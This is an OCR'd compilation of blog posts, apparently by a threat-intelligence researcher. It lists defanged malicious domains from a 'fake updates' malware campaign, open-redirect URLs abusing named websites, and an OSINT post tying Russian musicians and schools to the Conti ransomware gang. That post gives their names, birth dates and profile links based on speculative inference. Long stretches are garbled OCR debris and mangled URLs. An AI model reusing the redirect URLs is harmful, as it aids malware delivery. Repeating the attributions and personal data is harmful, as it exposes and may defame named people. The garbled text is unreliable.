hxxp://cc2-btc.cc 

hxxp://dyncheck.com 

hxxp://luxchecker.pw 

hxxp://major.ms 

hxxp://securecall.club 

hxxp://securecall.top 

hxxp://checkzilla.io 

Including the following two XMPP/Jabber accounts: 
mcduckgroup@exploit.im 

uvoice@xmpp.jp 


1. bttps://blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEgthj1YTW9Z- 3LSugCzVF jASk91i6DkDC86FuF 9NR7ogVG1. 
40u0ZM1wV-penFn_RmPeDf4yrMx50KMiewt36Knga2Jjo8mEjLpqot 
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1.3.10 The Most Innovative Cyber Security Leader to Watch in 2023 (2023-12-15 19:01) 


[1] 


Dear blog readers, 
| did it. Check out the article [2]here. 


Related photos: 


[3] 


~ (oT, 


Cl LOOK 


In Pursuit of 
Cyberjusticé 


VA 


Yanchev 


Navigating the World of CyBerthreats 


[4] 
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C= 


The certificate is awarded to 


by ClOLook in recognition as one of 


The Most Innovative Cyber Security 
Leaders to Watch in 2023 


for empowering excolience through innovative sofusons ond driving 
transformations in the niche. 


[5] 
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1. 
2. https://ciolook. com/in-pursuit-of-cyberjustice-dancho-danchev-navigating-the-world-of-cyberthreats/ 

3. 
4 
5. 


1.3.11 Looking for a Research Sponsorship (2023-12-15 19:02) 


Dear blog readers, 
Are you interested in sponsoring my research on my way to grab a new laptop for the holidays? 


Drop me a line at dancho.danchev@hush.com to discuss and I'll do my best to deliver the 
results that we agree upon. 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEgUXU6Gv2XgNt11k17XjUojGdEok81oIdchRFXp68qdHG20vwY_MJo8d 


oEC3JO903r8Uu- zZ08ws-LadJN4QQb_PzZooorudXbMcuf3jOsRZha2 


1.3.12 Offering my Laptop for Memorabilia Purposes (2023-12-15 19:02) 


[1] 
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Dear blog readers, 


Who wants to acquire and purchase my laptop 2015-2023 for memorabilia purposes and pos- 
sibly somehow use it preserve or display it somewhere? 


Related photo: 


[2] 


Race : ~-by Dancho Oanchey a 
Mts Had anchex blogspot.com ~~ 
Email: gancho.daachey@aush.com 2 


ee Pee aoe 
<> - ty 
eine “ress 


Drop me a line at dancho.danchev@hush.com 


1. https: //blogger . googleusercontent .com/img/a/AVvXsEg_7MSW_z_V-I16SgkVJNt8q-Dr6BNNXD1XXxGdzk1I3££KVtnXOBu0HOB 
AthxA8YHhEZoSD jTK5nn19fVjpW3ELuPIg2myBg JXyiFSARkKjzw6Fb 
2. https: //blogger .googleusercontent .com/img/a/AVvXsEg_3NNP5AMTHZO0igE81h1jwznVHrDvieDVysTrsB3tGVqX1CROWibRbWK 


qFXDsBiI gQXEJGLjuq/7vEJc4NicgRNtWwjvdxX4_PJ50dsdVEGOU_yj 


1.3.13 Upcoming Webinar Participation (2023-12-15 19:02) 


[1] 
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A IAE PARIS Or XRATOR 


The evolving threat landscape and the future of cybercrime. 


12 December 2023 Dancho Danchev 
18:30 (Paris) Threat Intelligence Pioneer 
Nation-state cybercrime researcher 

HOSTED BY 
or . Ronan Mouchoux 
y ‘1 ye Tryna Threat Intelligence Specialist 
Co-Director of the Risk Chair Cofounder of XRATOR 


Dear blog readers, 
Check out the link [2]here. 
1. https: //blogger . googleusercontent.com/img/a/AVvVXsEjWuPOJvNGz2brUfWL1OBK6zBZoF cHgktfGUett cNC26tSTrLP1L9eLn 


i9FPmOysfhRdFylsmOOtLhHew- ZVfTB20GTzJairtIBCm62M276xJO 
2. https: //www.linkedin. com/events/theevolvingthreatlandscapeandth7138811320363036672 


1.3.14 Who’s Pushing All The "Fake Updates" Malicious Software Using Redirec- 
tors and Traffic Distribution and Redirection Systems and Tools Domains? 
(2023-12-28 13:03) 


[1] 
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You're opening a new wed page 9 
anpiswZv_biggerfun.org that 6 not part of NP 


I’ve recently observed an increase in compromised or exploited to be precise in the context 
of abusing unfixed web application flaws such as for instance redirection notifications on high- 
traffic and high-profile Web sites where the ultimate goal would be to push traffic distribution 
and traffic management rogue domains part of a URL redirection chain where the ultimate 
goal would be to utilize both legitimate high-traffic and high-profile Web sites including purely 
malicious Web sites for the purpose of dropping malicious software on the targeted hosts. 


The surprising part? The primary and entire portfolio of these traffic redirection and traffic 
management domain are parked on 193.106.175.18 - AS50465 - IQHost Ltd where one of the 
bigger domain farms is parked at hxxp://biggerfun.org. 


[2] 
171 


fonts.googleapis.com 
fonts.gstatic.com 
machinetext.org 
— surelytheme.org 
freethegirlinitiative.org 
bluegaslamp.org 
draggedline.org 


throatpills.org 


climedballon.org 


Sample misconfigured high-traffic and high-profile Web sites that allow redirections potentially 
bypassing reputation filters include: 


hxxp://afmonline.org/?URL=hxxp://khTrnBOWV8.biggerfun.org/khTrnBOWV8/ 
hxxp://whiskyparts.co/?URL=m88Z2iiER.biggerfun.org/M88Z2iiER/ 
hxxp://hardemancounty.org/?URL=http %3A %2F %2F1FXddDHkYN.biggerfun.org/1FXddDHkYN/ 
hxxp://bukkit.org/proxy.php?link=hxxp://uToqSuwC. biggerfun.org/uToqSuwC/ 
hxxp://www.centralsynagogue.org/? URL=hxxp://NjNr8Mkm.biggerfun.org/NjNr8Mkm / 

hxxp://board-en. piratestorm.com/proxy.php?link=http %3A %2F %2Fnpn8KwBr.biggerfun.org/npn8KwBr/ 
hxxp://boards.theforce.net/proxy.php?link=hxxp://WihYqBBuvj.biggerfun.org/W ihYqBBuvj/ 
hxxp://www.cutrite.com.au/?URL=hxxp://9MVRIHjF.biggerfun.org/9MVRIHjF/ 


[3] 
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Sample traffic redirection and traffic management domains involved in the campaign include: 
hxxp://surelytheme.org 

hxxp://bluegaslamp.org 

hxxp://throatpills.org 

hxxp://draggedline.org 

hxxp://machinetext.org 

hxxp://throatpills.org 


hxxp://climedballon.org 


[4] 


ee ee 


« 
ok’ 
a 


OHost Lid 


Sample related domains known to have been involved in the campaign and are currently 
parked at 193.106.175.18 - AS50465 - IQHost Ltd include: 


hxxp://jsqur.com 
hxxp://libertader.org 
hxxp://mrbotn.jsqur.com 
hxxp://www.catsndogz.org 
hxxp://user179.jsqur.com 
hxxp://marcusdesigninc.jsqur.com 
hxxp://nuvoleparlanti.jsqur.com 
hxxp://fserver.jsqur.com 
hxxp://download.www.windowlight.org 
hxxp://mtf-misawa.jsqur.com 
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hxxp://cdn.jsqur.com 
hxxp://dashtiha.jsqur.com 
hxxp://vitkutin.jsqur.com 
hxxp://permisdeconduire.jsqur.com 
hxxp://olympics.jsqur.com 
hxxp://emv1.vibedroom.org 
hxxp://melpar-emh1.jsqur.com 
hxxp://u.admin.backendjs.org 
hxxp://billtieleman.jsqur.com 
hxxp://descarte.jsqur.com 
hxxp://4m.jsqur.com 
hxxp://sn007.jsqur.com 
hxxp://win24.jsqur.com 
hxxp://web3449.jsqur.com 
hxxp://cgxdave.jsqur.com 
hxxp://cassandre.jsqur.com 
hxxp://deeptrickday.org 
hxxp://xxxl80.jsqur.com 
hxxp://91.jsqur.com 
hxxp://castlerea.jsqur.com 
hxxp://dkline.jsqur.com 
hxxp://daws-512.jsqur.com 
hxxp://ufl.jsqur.com 
hxxp://eggert.jsqur.com 
hxxp://apps.jqueryj.com 
hxxp://frightysever.org 
hxxp://beal.jsqur.com 
hxxp://survey.backendjs.org 
hxxp://best-funny-quotes.jsqur.com 
hxxp://jeanm.jsqur.com 
hxxp://forms.admin.backendjs.org 
hxxp://comtenc.jsqur.com 
hxxp://dannyfilm.jsqur.com 
hxxp://office.backendjs.org 
hxxp://jqueryj.com 
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hxxp://longtail.jsqur.com 
hxxp://web6201.jsqur.com 
hxxp://noytek-gw4.jsqur.com 
hxxp://gazeta.jsqur.com 
hxxp://www.treegreeny.org 
hxxp://cpfm.jsqur.com 
hxxp://asims-rdck1.jsqur.com 
hxxp://indiajobscircle.jsqur.com 
hxxp://babbar.jsqur.com 
hxxp://gorki.jsqur.com 
hxxp://gmailblog.jsqur.com 
hxxp://dvan.jsqur.com 
hxxp://carpinteros-aluminio.jsqur.com 
hxxp://web18332.jsqur.com 
hxxp://wallah.jsqur.com 
hxxp://si.jsqur.com 
hxxp://shems.jsqur.com 
hxxp://vigen.jsqur.com 
hxxp://sws.jsqur.com 
hxxp://routetest.jsqur.com 
hxxp://account.admin.backendjs.org 
hxxp://secure-ite2-origin.jsqur.com 
hxxp://mdm.backendjs.org 
hxxp:// dmarc.jqueryns.com 
hxxp://mdm.backendjs.org 
hxxp://mntc.jsqur.com 
hxxp://powerful.jsqur.com 
hxxp://whitney.jsqur.com 
hxxp://stream.jsqur.com 
hxxp://uhost.jsqur.com 
hxxp://unix3.jsqur.com 
hxxp://www.florida.jsqur.com 
hxxp://jkelley.jsqur.com 
hxxp://derby.jsqur.com 


hxxp://currier.jsqur.com 
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hxxp://wp.admin.backendjs.org 
hxxp://frente-a-camaras.jsqur.com 
hxxp://facman.jsqur.com 
hxxp://b10.jsqur.com 
hxxp://arehn.jsqur.com 
hxxp://cprat.jsqur.com 
hxxp://hpermsp.jsqur.com 
hxxp://ksia.jsqur.com 
hxxp://jhansen.jsqur.com 
hxxp://biggerfun.org 
hxxp://kodakr.jsqur.com 
hxxp://samfox.jsqur.com 
hxxp://apps.jsqur.com 
hxxp://passe.jsqur.com 
hxxp://walkman.jsqur.com 
hxxp://stovallscx.jsqur.com 
hxxp://antivir.jsqur.com 
hxxp://link2-me.jsqur.com 
hxxp://xx9.jsqur.com 
hxxp://quine.jsqur.com 
hxxp://v.circuspride.org 
hxxp://cn.circuspride.org 
hxxp://x.circuspride.org 
hxxp://pay.circuspride.org 
hxxp://ssl.circuspride.org 
hxxp://physiology.jsqur.com 
hxxp://mytabletpcuk.jsqur.com 
hxxp://gdsz.jsqur.com 
hxxp://daws-43-5.jsqur.com 
hxxp://cfg.circuspride.org 
hxxp://ip90.jsqur.com 
hxxp://oily.jsqur.com 
hxxp://jqueryh.org 
hxxp://tamarack.jsqur.com 
hxxp://macgo.jsqur.com 
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hxxp://interlock.jsqur.com 
hxxp://cmu-cc-vma.jsqur.com 
hxxp://daws91-3.jsqur.com 
hxxp://norman.jsqur.com 
hxxp://www.16.jsqur.com 
hxxp://web3933.jsqur.com 
hxxp://mta-sts.bluegaslamp.org 
hxxp://212.jsqur.com 
hxxp://dooly.jsqur.com 
hxxp://www.bigbricks.org 
hxxp://machinetext.org 
hxxp://kb.windowlight.org 
hxxp://catsndogz.org 
hxxp://whitedrill.org 
hxxp://www.neworderspath.org 
hxxp://jqueryns.com 
hxxp://sorteios-e-promocoes.jsqur.com 
hxxp://web5422.jsqur.com 
hxxp://ivtortypqfyi.greedyclowns.org 
hxxp://ivtorlypqfyi.greedyclowns.org 
hxxp://ivladimir.surelytheme.org 
hxxp://ivodimir.surelytheme.org 
hxxp://liorida.surelytheme.org 
hxxp://rota-sts.climedballon.org 
hxxp://climedballon.org 
hxxp://treegreeny.org 
hxxp://daddygarages.org 


hxxp://emperorplan.org 


[5] 
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hxxp://bigbricks.org 
hxxp://greedyclowns.org 
hxxp://vibedroom.org 
hxxp://backendjs.org 
hxxp://dailytickyclock.org 
hxxp://neworderspath.org 
hxxp://devcodejs.org 
hxxp://cancelledfirestarter.org 
hxxp://greedyfines.org 
hxxp://limeerror.org 
hxxp://bluegaslamp.org 
hxxp://throatpills.org 
hxxp://drilledgas.org 
hxxp://draggedline.org 
hxxp://windowlight.org 
hxxp://sevenpunches.org 
hxxp://circuspride.org 
hxxp://linedgreen.org 
hxxp://surelytheme.org 
hxxp://vivaldi-ed.group 
hxxp://cashapp-renewal.com 
hxxp://ing-update.info 
hxxp://bankid-app.net 
hxxp://commonwealth-renewal.com 
hxxp://transfer-management.com 
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hxxp://banko-atnaujinimas.com 
hxxp://s-identity-verwalten.com 
hxxp://bigfat.shop 
hxxp://fomzerapoze.shop 
hxxp://aremonuza.shop 
hxxp://hanmozapre.shop 
hxxp://bamizorapa.shop 
hxxp://yazevora.com 
hxxp://ipko-aktualizacja.com 
hxxp://halifax.signin-helpdesk.com 
hxxp://signin-helpdesk.com 
hxxp://hailfax.signin-helpdesk.com 


hxxp://online-helpdesk-portal.com 


hxxp://santander.online-helpdesk-portal.com 


hxxp://jquerypure.com 
hxxp://de-system-913580.xyz 
hxxp://targo.de-system-913580.xyz 
hxxp://be-systeem-8510598.xyz 
hxxp://ns1.putinkremel.su 
hxxp://notudhost.com.ru 
hxxp://trsew.ru 
hxxp://fashmodsite.uno 
hxxp://nnnten.ru 
hxxp://tenhost.com.ru 
hxxp://au-08.top 
hxxp://jutralalali.xyz 
hxxp://gilirges.ru 
hxxp://www.gilirges.ru 
hxxp://ftp.gilirges.ru 
hxxp://www.tanmhopisj.xyz 
hxxp://tanmhopisj.xyz 
hxxp://dev.urbangroup.ru 
hxxp://equalizer.dev.urbangroup.ru 
hxxp://vk.equalizer.dev.urbangroup.ru 


hxxp://partners.urbangroup.ru 
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hxxp://realty-2.urbangroup.ru 
hxxp://ivakino.urbangroup.ru 
hxxp://gtry.ru 
hxxp://serferio.ru 
hxxp://forum-laikovo.urbangroup.ru 
hxxp://urbangroup.ru 
hxxp://myrussianland.ru 
hxxp://gb2nevinsk.ru 
hxxp://englishbiblioteka.ru 
hxxp://aleana63.ru 
hxxp://aptekaplus23.ru 
hxxp://chulkovo.info 
hxxp://mchedlidze.ru 
hxxp://stroytransm.ru 
hxxp://flystore.ru 
hxxp://kino-pirat.net 
hxxp://2sunss.com 
hxxp://posadisvoederevo.ru 
hxxp://testcosmetic.com 
hxxp://vkino.me 
hxxp://v1080hd.com 
hxxp://r-style.com 
hxxp://science-techno.ru 
hxxp://kinotuz.ru 
hxxp://901901.ru 
hxxp://ludota.ru 
hxxp://maindoor.ru 
hxxp://kinoxaba.ru 
hxxp://youcanexcel.ru 
hxxp://gidonlinehd.ru 
hxxp://kinoggo.ru 
hxxp://100pdf.net 
hxxp://kinoext.ru 
hxxp://www.mreporter.ru 
hxxp://magobr.ru 
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hxxp://Ig-soft.ru 
hxxp://anapa-new.ru 
hxxp://fat-man.ru 
hxxp://gracio.ru 
hxxp://ikd.ru 
hxxp://poseidonboat.ru 
hxxp://vetla.ru 
hxxp://74dom.ru 
hxxp://kabrik-servis.ru 
hxxp://tehnopanda.ru 
hxxp://creativejournal.ru 
hxxp://ufamenu.ru 
hxxp://idf.ru 
hxxp://sporthit.ru 
hxxp://injgeo.ru 
hxxp://asbank.ru 
hxxp://wood-lux.ru 
hxxp://Ibf51b14.justinstalledpanel.com 


I’ll continue monitoring the campaign and will post updates as soon as new developments take 
place. 


1. https: //blogger . googleusercontent . com/img/b/R29v22x1/AVvXsEgs5d1S7E-Ce7—ilprkLPNDpH_Jrcnq5zLdi2f4RVo_6tn4j 
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2024 


2.1 January 


2.1.1 Who’s Behind the Conti Ransomware Gang? - Part Two (2024-01-03 16:35) 


[1] 


FOREIGN GOVERNMENT-LINKED MALICIOUS CYBER ACTIVITY 
TARGETING U.S. CRITICAL INFRASTRUCTURE 


If you have information that ties hacking groups 
such as Conti, TrickBot, Wizard Spider; the 
hackers known as “Tramp,” “Dandis,” 
“Professor,” “Reshaev,” or “Target”; or any 


> 
> 
malware or ransomware to a foreign wus: *PROFESSOR” Jaus “RESHAEV" 


government targeting U.S. critical aN 
infrastructure, you may be eligible for a reward. s=_U.S. GOVERNMENT PHOTO 


m IS THIS THE CONTI 
Send your information to RFJ via our mee ASSOCIATE KNOWN AS 


Tor-based tip line below. AUAS:“TRAMP” | auas:“DANDIS” "TARGET"? 


Tor Link:heS5dybnt7sr6cm32xt77pazmtm65flay6irivtflrugfcSep7eiodiad.onion oV 


fu 

“U.S. Department of State @ +1-202-702-7843 ; 

"3 Diplomatic Security Service 
~~ Rewards for Justice @RFJ_USA 


In a series of blog posts | exposed the "[2]The Top Management of the Conti Ransomware 
Group’s Fashion and Charity Brands" including "[3]Who’s Behind the Conti Ransomware 
Gang" where | also offered an in-depth peek inside "[4]The Conti Ransomware Gang and 
the Trickbot Cybercrime Enterprise XMPP’s and Jabber Account IDs" where | also successfully 
applied for the Rewards for Justice program "[5]Applying for the Rewards for Justice on the 
Conti Ransomware Gang Program" where | also published never-published or discussed before 
"[6]New Images Courtesy of the Conti Ransomware Gang" including my Rewards for Justice 
Conti Ransomware Gang research compilation "[7]Dancho Danchev’s Rewards for Justice 
Conti Ransomware Gang Research and Analysis Compilation" which you can grab from [8]here 
including my first Twitter Space on how | tracked down the Conti Ransomware Gang "[9]My 
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First Twitter Space on How | Tracked Down The Conti Ransomware Gang Using Real-Time 
OSINT" including to expose "[10]Exposing Bentley and Liam From The Conti/Trickbot Malware 
Gang" including to publish never-published or discussed before Conti Ransomware Gang 
videos and images courtesy of the "[11]The Conti Ransomware Gang" including to publish 
an additional set of never-published or released videos courtesy of the Conti Ransomware 
Gang "[12]The Conti Ransomware Gang - Videos - Part Two" including to elaborate on some 
of my research in my "[13]Rewards for Justice - Dancho Danchev" including to publish an 
additional set of "[14]The Conti Ransomware Gang’s OSINT Artifacts" including to also provide 
"T15JA Compilation of Conti Ransomware Gang BitCoin Transaction IDs - An OSINT Analysis" 
including "[16]A Compilation of Known Conti Ransomware Malicious Domains - An OSINT 
Analysis" including "[17]A Compilation of Known Conti Ransomware Themed Malicious and 
Fraudulent MD5s - An OSINT Analysis" including "[18]Exposing the Fashion Brands of the Conti 
Ransomware Group" including "[19]Exposing the Trickbot Malware Gang - An OSINT Analysis" 
including "[20]Exposing the Conti Ransomware Gang - An OSINT Analysis" including "[21]A 
Compilation of Known Conti Ransomware Gang Malicious Executable Download Locations - An 
OSINT Analysis" including "[22]Exposing the Conti Ransomware Gang - An OSINT Analysis" 
including "[23]Rewards for Justice - Dancho Danchev" including "[24]How to Take Down the 
Conti Ransomware Gang - A Practical And Relevant Case Study on Taking Down Cybercriminal 
Infrastructure - A Practical Example". 


In this post I’ll do a last round of elaboration into all the research efforts I’ve been putting into 
identifying core members of the Conti Ransomware Gang using their recently leaked internal 
communication publicly including to use exclusively OSINT for the purpose of successfully iden- 
tifying key and core members of what appears to be a diversified cybercrime gang that has 
a pretty interesting way of distributing their fraudulently obtained income in the context of 
sponsoring and participating in fashion shows and other educational and music sponsorship 
efforts and campaigns on the Russian market supposedly using the stolen income that they’ve 
obtained using their ransomware tactics and techniques. 


What! came up was the following a private teaching school a rap and hip-hop music label where 
we got some of the core Conti Ransomware Gang members doing their advertising creative 
and brochures next to doing their hardcore "upcoming" ransomware brand releases including 
several fashion and clothing brands where we once again have core members of the Conti 
Ransomware Gang doing their advertising and brochure creative. 


The primary goal behind this post and analysis would be to elaborate as to the diverse nature 
of the members of the Conti Ransomware Gang in the context of having them involved in 
fashion music and teaching schools business and charitable initiatives in Russia supposedly 
using the stolen income which they obtained using their ransomware operation online. 


It’s also worth pointing out that this entire analysis including the OSINT analysis and the OSINT 
research and enrichment analysis is entirely based on the Conti Ransomware Gang’s internal 
leaked communication and is done exclusively by me with some quite positive and confirmed 
results already. 


[25] 
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Sample Conti Ransomware Gang image obtained using public sources based on the gang’s 
internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist and his 
album "Personality" apparently produced by the Conti Ransomware Gang’s team members 
responsible for the advertising creative development for the gang 


Based on my research and analysis the photo obtained using public sources based on the 
gang’s internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist and his 
album "Personality" belongs to the Russian rap and hip-hop artist known as Linkvill where we 
have members of the Conti Ransomware Gang producing their logos and advertising creative 
part of their portfolio. 


Personally identifiable information for Evgeny Samsonov also known as Linkvill: 


hxxp://vk.com/eugene _linkvill 
hxxp://vk.com/artist/linkvill 
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hxxp://vk.com/linkvill _poetry 
hxxp://www. youtube.com/channel/UC9fVu7UVgxBaCRz7RJD7DeQ 


Sample personal photos of Evgeny Samsonov also known as Linkvill: 
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Contacts 


Evgeny Samsonov 
rOnoc/CTUXH 
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It also appears that Evgeny Samsonov also known as Linkvill whose album cover "Personality" 
was obtained using public sources and appears to be produced by members of the Conti 
Ransomware Gang who are responsible for creating the gang’s advertising creative is also 
part of the Plastika Sound Boutique Ekaterinburg where we also have a second image courtesy 
of members of the Conti Ransomware Gang mentioning the Plastika music label. 


[49] 


Sample personally identifiable information for Plastika Sound Boutique Ekaterinburg: 


hxxp://vk.com/plastika.space 
hxxp://plastika.space 
Address: ynuua Kuposa, 9, EkatepuxH6ypr 


Part of Plastika Sound Boutique Ekaterinburg are: 


- Nikita Zharinov - born on 10th of January 2002 
- Ice Costa - hxxp://vk.com/icecosta 
- Alexey Plyushkin - born on 11th of April 1994 
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It gets even more interesting when we research a second image courtesy of the Conti Ran- 
somware Gang which was once again obtained from their recently leaked internal communica- 
tion. 
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Sample Conti Ransomware Gang image obtained using public sources 

based on the gang’s internal leaked communication for a cover of a 

Russian Rap and Hip-Hop Artist Ice Costa apparently 

produced by the Conti Ransomware Gang’s team members responsible for the 
advertising creative development for the gang 


The image appears to be a second album cover once again produced by team members of 
the Conti Ransomware Gang responsible for advertising logos and advertising creative devel- 
opment this time by Ice Costa who is also a Russian rap and hip-hop artist who is also part of 
the Plastika Sound Boutique Ekaterinburg. 


Sample photos of Ice Costa  (hxxp://www.youtube.com/channel/UCJQmq6U _ - 
IEYIDnrNSOzZC6dQ): 
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The original Ice Costa album cover which is greatly similar to the one produced by members 
of the Conti Ransomware Gang obtained using OSINT 
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[58] 


8 yepBen (Prod. by ICE COSTA) - IuunKsunn - Amtu 
8 yepBen (Prod. by ICE COSTA) 


© 2022 PLASTIKA 
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Sample photos of Nikita Zharinov who is among the original founders of the Plastika Sound 
Boutique Ekaterinburg: 
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Sample photos of Alexey Plyushkin who is among the original founders of the Plastika Sound 
Boutique Ekaterinburg: 
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65) ICE COSTA 
“ 19 Mar 2021 at 4:02 pm 


@ REC PLASTIKA 
“+ COVER Anexceit Ku6aHos 


..He Bugen go6pa unn 3na, A He 3Halo OTBET 
A gonuBalo AbIM MONOKOM Ha O6en 


PARENTAL 


ADVISORY 


EXPLICIT CONTENT 


It appears that based on my OSINT analysis Alexey Plyushkin is the author of the original 
cover for Ice Costa’s album which can be also found in Conti Ransomware Gang’s internal 
leaked communication which means that he supposedly knows the actual team member of 
the Conti Ransomware gang that produced the advertising creative who also produced Evgeny 


Samsonov’s (Linkvill) album cover. 


Next we got three related images once again courtesy of the Conti Ransomware Gang’s 
internal leaked communication this time for "Global School" teaching enterprise and for the 


Youla Land dance lessons school in Russia. 
Sample photos include: 


[67] 
219 


[68] 


220 


BEST LESSON 
SERTIFICATE 


OT4ETHLIM KOWEPT 
WKOAb TAHWEB YOULA 


0 YO 
wt Uz 
<2 Ie 


Sample personally identifiable information: 


hxxp://school-global.ru 


hxxp://youladance.ru 


Sample photos: 
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Q Se284 Le pensenss pect) Ocero tae 
Ws eect eee 


Tremian = Ollmone ~ UceKypem + Kypce Gnefereh - MetumeKypce Denna oo0o 


3aNMWNCcb Ha KyPCbi M Nonyun 
Ba 3aHATHA B NOMAapoK* 


® ans BCcex BO3pacTosB 
® noproTrosKa kK Ef3, OFS 
®@ 3aHATHMA C HOCHTeNneM 


[71] 


wnAMM ny Tenn en! Pacnucanve Marasun Kontaxto! 
yt Yh Ancunnnwnnt —Npenogasa Uerbi oO 


Xopeorpaduyeckan 
WwKOsIa-CcTyANA 


Hay4M KPaCuBO TaHLieBaTb B 060M 
Bospacte! 


JanucaTeca 


Next we’ve got yet another photo of team members of the Conti Ransomware Gang once 
again based on their internal leaked communication mentioning [72]Morenehost which is a 


well known bulletproof hosting provider. 
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Sample personally identifiable information: 


Teneqmou: +373 775 96666 

E-mail: info@morene.host 

Skype: morene.host 

Jabber: morene@jabber.morene.host 
ICQ: 700812649 / 702647156 
Telegram: @hostmorene 

Viber: +373 775 96666 

WhatsApp: +373 775 96666 
OHNanH-yaT: https://morene.host 


1, https: //blogger. googleuser content. con/ing/b/RO0v22:a /AVwXsEhopind6ZEl InBRtxBGezyGPHia7A_ PuBCBKs vai St2g 
"http: //ddanchev. blogspot con/2028/08/the-vop-managenentof- cont i-ransouvare. hal 
. https: //ddanchev. blogspot . com/2023/08/whos~behind-conti-ransomware-gang .html 


https: //ddanchev .blogspot .com/2023/09/the-conti-ransomware-gang-and-trickbot .htm 
https : //ddanchev. blogspot. com/2023/09/applying- for-rewards-for- justice-on.htm 


. https: //ddanchev.blogspot .com/2023/09/new- images-courtesy-of-conti-ransomware.htm 
. https: //ddanchev.blogspot .com/2023/09/dancho-danchevs-rewards-for-justice.htm 
. https: //archive.org/details/rewards-for-justice-01 


https : //ddanchev. blogspot. com/2023/10/my-first-twitter-space-on-how-i-tracked.htm 


O©OANOURWHN 


11. 

12. 
13. 
14. 


ttps://ddanchev.blogspot .com/2022/06/a-compilation-of-conti-ransomware- gang. htm 


ttps://ddanchev.blogspot .com/2022/06/a-compilation-of-known-conti-ransomware_4.htm 
ttps://ddanchev. blogspot .com/2022/06/a-compilation-of-known-conti-ransomware.htm 


18. https: //ddanchev.blogspot .com/2023/04/exposing-fashion-brands-of-conti.htm 
19. https: //ddanchev.blogspot . com/2022/03/exposing-trickbot-malware-gang-osint .htm 


ttps://ddanchev. blogspot .com/2022/02/exposing- conti-ransomware-gang-osint_28.htm 


ttps://ddanchev. blogspot .com/2022/06/a-compilation-of-known-conti-ransomware_21.htm 


22, 

23, 

24, 

25 


QpEiJOMtGPI_oNZzw1igZGQj046_UNIKuZw/7WWH2krElu-DTqgtpohfL 
26. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEiJD2bRJZ1cF0gRE11_NP4PgwBU_XiE0QjknDdZiiWVsHz 
£3zZYhlgaiNSXq3YD80Rt 7puQtU3_MJh3ulakwAtk2hF_UPLbPjdf5m 


27. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEg8G4udB3HWUib7T7WF 1H2cTaNP1FiaBbn3u1U5GD£3DX8 
Z8ehM9 JhD8tKb1inW8WuTt OwFiEA6-LDgOipah_kkd1Yo9LJXeKoruD76 
28. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgjZTWEK6ixa4B91H6gZCv_SAR17xYSapjU1-ZIIZOiWxo 


i} 
fon) 
nt 
2 


u1KB jOb9gEBEfhRIx7iIDX3qPTGcuoyLjGSCWPrf5bM56fUzxXv- 
9. 


N 


ct 
(ag 
uc) 
n 
| Pad 
"aS 
oO 
# 
° 
9g 
09 
0) 
RK 
09 
° 
° 
09 
H 
oO 
Sc 
“1 n 
; | ® 
re 
2) 
° 
“iB 
a | ag 
0) 
B 
ct 
a 
fe} 
B 
~ 
H. 
8 
09 
S 
jon 
S 
=e) 
N 
Se) 
<q 
N 
roN 
fa 
H 
~ 
> 
< 
<q 
fal 
n 
i] 
BH. 
tal 
09 
[o) 
Q 
< 
{>) 
uc) 
N 
aS 
D 
U 
j=) 
<= 
tS 
(=) 
B 
= 
D 
° 
Q 
fo) 
j=) 
(s) 
a 
=] 
i=) 
< 
B 
QD 
pb 
B 
(ee) 
a) 
fe) 
yr 
foe) 
N 
wn 
Ke) 
09 
n 
N 
» 


rw) 
I 
‘Uv 
Q 
iS) 
us 
re) 
Q 
j=) 
< 
=") 
a 
H 
N 
N 
<= 
oO 
i 
ct 
w 
S 
i 
NJ 
ce 
c 
Q 
fe 
mw 
ua 
u 
~ 
Fh 
w 
au 
u 
<q 
jo) 
=] 
SG 
Q 
ba 
Q 
qq 
2 
eH 
n 
oO 
09 
fe) 
° 
ao 
B 
a 
H 
N 


ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEi-t8eLyWvzasdczb-4C jZSDKX9wDb3W11V0b2gXrbJA7_ 


Ww 
= 


OO 
wn 
ct 
=a 
n 
oO 
< 
09 
© 
it 
‘Ug 
Hy 
H 
No} 
Qa 
B 
= 
Kh 
es 
es 
ps) 
gq 
Q 
pe 
Qa 
B 
o>) 
ir] 
ps 
B 
=z 
4 
iS 
< 
< 
=a 
Ww 
Ww 
Q 
is] 
= 
oe) 
B 
fle} 
Fh 
“NI 
is) 
N 
H 
09, 
=a 
c 
tar 


WwW 
H 
ct 
ct 
ue] 
n 
ie 
=s 
ion 
H 
fe) 
0Q 
0Q 
() 
R 
09 
fo) 
fe} 
(he) 
H 
(0) 
(= 
n 
(0) 
5 
fa) 
° 
=] 
ct 
(0) 
=] 
ct 
a 
° 
B 
Ss 
b 
B 
oq 
~S 
lon 
~ 
ie 
N 
oO 
< 
N 
N 
tal 
H 
~ 
Pd 
< 
<g 
al 
n 
ina 
= 
Ww 
N 
Rd, 
N 
° 
+O 
N 
() 
fH 
H 
oe) 
= 
w 
<= 
Ss 
N 
qq 
B 
Q 
Ww 
N 
oO 
g 
(he 
pad 
=m 
N 
B, 
eS 
pas) 
ina 
aS 
=] 
(os) 
fo} 
ps) 
© 
< 
n 
N 
) 


mnkbal7yErC3ys041KsLAOFT6CZuri5u8Rt6rAPcDNcVv0iCsurL_36 
2 


WwW 


Xe) 
Hh 
al 
w 
B 
w 
i) 
S 
HA 
< 
w 
pan 
ss 
yr 
ie) 
No |e 
an 
wo 
=) 
ia] 
ol 
[ay 
Q. 
> 
Q 
n 
es 
is 
a. 
oO 
ct 
HB. 
o 
my): 
tal 
< 
~ 
ot 
fo) 5 
w 
tal 
<4 
Nj 
Ny 
Hh 
ue) 
4 
w 
B 


ct 
ct 
uc] 
n 
~ 
fas 
ion 
H 
fe} 
0Q 
09 
(0) 
5 
09 
fo) 
fe} 
(he) 
H 
(0) 
i= 
n 
(0) 
4 
fa) 
° 
(=! 
ct 
(?) 
Bb 
ct 
fa) 
° 
B 
~ 
H 
B 
(te) 
~S 
ion 
aS 
De 
N 
oO 
<q 
N 
NO 
tal 
H 
~ 
Pad 
< 
<g 
asl 
n 
ina 
qw. 
tal 
wn 
© 
tf 
N 
@ 
n 
carl 
= 
Hy 
(oe) 
KS 
fas] 
= 
< 
x 
=a 
N 
tH 
a 
